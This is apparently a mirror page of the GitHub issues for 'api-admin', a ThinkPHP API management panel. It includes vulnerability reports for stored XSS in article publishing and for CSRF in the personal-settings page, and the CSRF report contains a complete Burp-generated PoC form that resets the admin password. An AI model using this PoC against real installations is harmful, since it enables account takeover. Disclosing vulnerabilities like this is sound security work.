Code Monkey home page Code Monkey logo

api-admin's Introduction

Hi I Am I 👋

📫 How to reach me:

api-admin's People

Contributors

5ime avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

api-admin's Issues

增添数据出错

v1.2版本,可以修改已存在的数据
但无法增加数据,后台增添总提示
页面错误!请稍后再试~
ThinkPHP V5.0.24 { 十年磨一剑-为API开发设计的高性能框架 }
环境:Linux CentOS 8.2.2004 + Nginx 1.18.0 + PHP7.3 + MySQL 5.7.31

666

有获取QQskey接口嘛

A stored XSS vulnerability exists in the published article

  1. In 'Article Publishing', write an XSS payload, and a pop-up window will appear directly due to the preview function.
    xsswriting
  2. After publishing the article, come to the front desk of the website, click the article just released, and the XSS pop-up window will appear.
    articleXSS

There is a CSRF vulnerability in the personal settings

  1. First, log in to the background, click Personal Settings. There is no captcha here and there is no requirement to verify the old password, try CSRF.
    personalsettings

  2. Then, feel free to enter a password, for example '777777', click submit, and grab the packet in Burpsuite.
    updatesuccess

  3. Use the packet of the second step to generate a CSRF POC, and then visit the CSRF page in the same browser.
    CSRF POC

     <html>
         <!-- CSRF PoC - generated by Burp Suite Professional -->
         <body>
         <script>history.pushState('', '', '/')</script>
             <form action="http://192.168.190.137/admin/index/editUserinfo" method="POST">
                 <input type="hidden" name="username" value="admin" />
                 <input type="hidden" name="password" value="777777" />
                 <input type="hidden" name="email" value="123&#64;qq&#46;com" />
                 <input type="submit" value="Submit request" />
             </form>
         </body>
     </html>
    

csrfpoc
changesuccess

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.